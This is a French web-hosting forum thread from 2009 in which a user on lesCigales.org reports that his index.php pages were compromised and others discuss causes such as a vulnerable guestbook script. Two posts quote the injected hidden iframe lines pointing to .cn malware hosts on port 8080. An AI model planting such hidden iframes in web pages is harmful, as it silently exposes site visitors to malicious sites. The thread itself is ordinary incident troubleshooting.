Sujet : Site piratée ?

Bonjour,
J'ai eu un problème avec mon site http://ousontmessauvegardes.lescigales.org/. Lorsque j'y suis aller, google chrome m'a dit que mon site récupérait des informations sur un autre site malveillant. J'ai donc télécharger l'index, et j'ai remarqué que du code y avait été ajouté.
Autre problème, le forum ne fonctionnait plus.
Serais-ce due a un hack ? Quelqu'un a-t-il une idée, ou aurais même déjà connu ce problème ?
Merci.

Re: Site piratée ?

Sans voir le code et avoir vu le site avant, difficile de répondre.

3 Dernière modification par noldu35 (28-05-2009 23:26:29)

Re: Site piratée ?

J'ai oublier de prendre en note le site
Mais est-il possible par exemple d'accéder au dossier d'un autre utilisateur ?

Re: Site piratée ?

??? entre 2 sites les cigales et se piquer les codes?
non pas du tout, à moins de se refriler les login et pass.

5

Re: Site piratée ?

@noldu35: c'est impossible smile
La structure des répertoires et l'exécution des CGIs est telle que seul votre compte utilisateur a accès à vos fichiers.

Je pense plutot à un software défectueux installé sur votre site.. par vous même ! smile

lesCigales.ORG sysadm1n
L'hébergeur qui sent bon la lavande - Un control panel qu'il est chouette - Viendez nous parler!
"All that is necessary for evil to triumph is for good men to do nothing."

6 Dernière modification par noldu35 (04-06-2009 12:59:36)

Re: Site piratée ?

Mon site a de nouveau été piraté, toutes les pages index.php ont été modifier, le code de la page est couper (ce que fait que la page ne fonctionne pas) et voici ce qui a été ajouté a la fin :

<iframe src="http://combinebet.cn:8080/index.php" width=122 height=131 style="visibility: hidden"></iframe>

Je vois pas comment on a pu piraté mon site, surtout que ça sert a rien vu qu'a chaque fois ce code se retrouve dans <?php et est donc interprété comme une erreur par php.

Re: Site piratée ?

je viens de voir que vous avez un livre d'or via un javascript.
ne serait ce pas simplement par là que le code s'insère?

Autre chose, avez vous un compteur invisible sur l'index.php?
c'est une autre possibilité.

En aucun cas, une autre personne ne peut rentrer via le FTP, sauf si vous avez donné les codes à quelqu'un.
N'avez vous pas un fichier avec les codes dans vos répertoires?

Pour le fait de pirater, certains s'amusent a pirater pour le plaisir, même si cela ne sert strictement à rien.

8 Dernière modification par noldu35 (05-06-2009 11:52:20)

Re: Site piratée ?

L'ajout de code comme celui ci ne permet que de piraté les client. Lors du piratage précédent, google chrome bloquait la page car il disait qu'elle amenait sur un site dangereux. Sinon mes identifiant FTP ne sont pas noté sur le site.
Sinon, vu que toutes les pages index.php ont été modifier, et en plus pas correctement, cela doit être un robot qui hack automatiquement je pense.

9

Re: Site piratée ?

J'ai aussi poster un truk qui se nome " norton antivirus " à ce propos mais bon apparemment ...
Osef coi , il y a aucunes réponses donc bon ...

Cela doit pas être le soucis des administrateurs que norton antivrus indique qu'un site héberger est en lien avec toutes les pages du site et cela même les pages d'index de " http://lescigales.org " ...

Tous les sites de " lescigales.org " se font tous les jours stoppés à cause de cela ...
Je ne citerai pas le site en question mais bon .... Tout part de lui coi ...

Au plaisir : )-

10 Dernière modification par Pierre-Jean (05-06-2009 21:08:36)

Re: Site piratée ?

Et pour info .....

Si les problèmes liés au virus du serveur posaient un problème ....
Il y a longtemps que le sujet " norton antivirus " aurai eu plus de remarques hein......

Il y a seulement à installer une version d'évaluation de norton antivurus pour voir que tout le serveur
http://lescigales.org
Possèdes 15 erreur qui sont indiqués en rouge bien pétant quand on navigue sur le site où même,
dés que le site apparait en résultat dans un moteur de recherche comme google ...

En gros dés le début on est au courant coi .....

Après bon ... Ce ne sont que 15 erreurs bien rouges récurrente ......

Si les admin s'en foute bah ......
Perso chu déjà super content de l'hébergement ...
Après .... je ferai vraiment super gaffe à ce que je met sur le site ....


Au plaisir : )-

11

Re: Site piratée ?

Bonsoir,

Oui je l'ai lu Pierre Jean, cependant je pense que le problème vient de ta machine locale. J'essayerais de regarder plus en détails prochainement.

lesCigales.ORG sysadm1n
L'hébergeur qui sent bon la lavande - Un control panel qu'il est chouette - Viendez nous parler!
"All that is necessary for evil to triumph is for good men to do nothing."

12 Dernière modification par Pierre-Jean (05-06-2009 21:31:19)

Re: Site piratée ?

I love You toad : )-

Mais cela le fait pour info sur les 2 pc qui ont norton d'install
Je stipule aussi que les 2 pc ne sont pas au même endroit géographique et qu'en plus ils appartiennent pas du tout aux mêmes personnes ...
Je penses que cela est préjudiciable au niveau de votre référencement car cela apparait direct dans les résultats de recherche de google et que en plus si des développeur développe sur des machines où leur entreprise oblige ce logiciel...Bah a mon avis ils essaye même pas d'afficher votre serveur ....

Sur mon pc perso je lai pas donc l' avais pas vu avant ...

Je ne veux pas du tout vous être préjudiciable où coi que se soit ,
Je rapel que j'adore être héberger chez vous , si mes post dérange, direct je les enléve , ce n'est vraiment pas mon but .....

So see You soon : )-

13

Re: Site piratée ?

deux jour de suite hmm ...
<iframe src="http://hugetoplocate.cn:8080/index.php" width=106 height=159 style="visibility: hidden"></iframe>

14

Re: Site piratée ?

Vérifie que tu as bien la dernière version d'@lex guestbook et regarde si ton code php analyse bien les entrées utilisateurs (s'il y en a et même si elles sont invisibles sur la page d'accueil, comme une page admin.php sans mot de passe par exemple).

>> SubTherMiX <<
>> alternux <<

15

Re: Site piratée ?

@noldu35 ?

lesCigales.ORG sysadm1n
L'hébergeur qui sent bon la lavande - Un control panel qu'il est chouette - Viendez nous parler!
"All that is necessary for evil to triumph is for good men to do nothing."

Re: Site piratée ?

deja, vires moi le rep documentation, ca évitera le piratage wink
tout est indiqué pour les MAJ, les commandes, javascript, etc...

J'ai juste DL le script et regardé les rep pour trouvé ca en essayant sur ton site.

17

Re: Site piratée ?

Il semble qu'on ne peut pas modifier les ficher avec les droit r--r--r-- (J'avai mis ces droit sur un fichier index, et il n'a pas été modifier)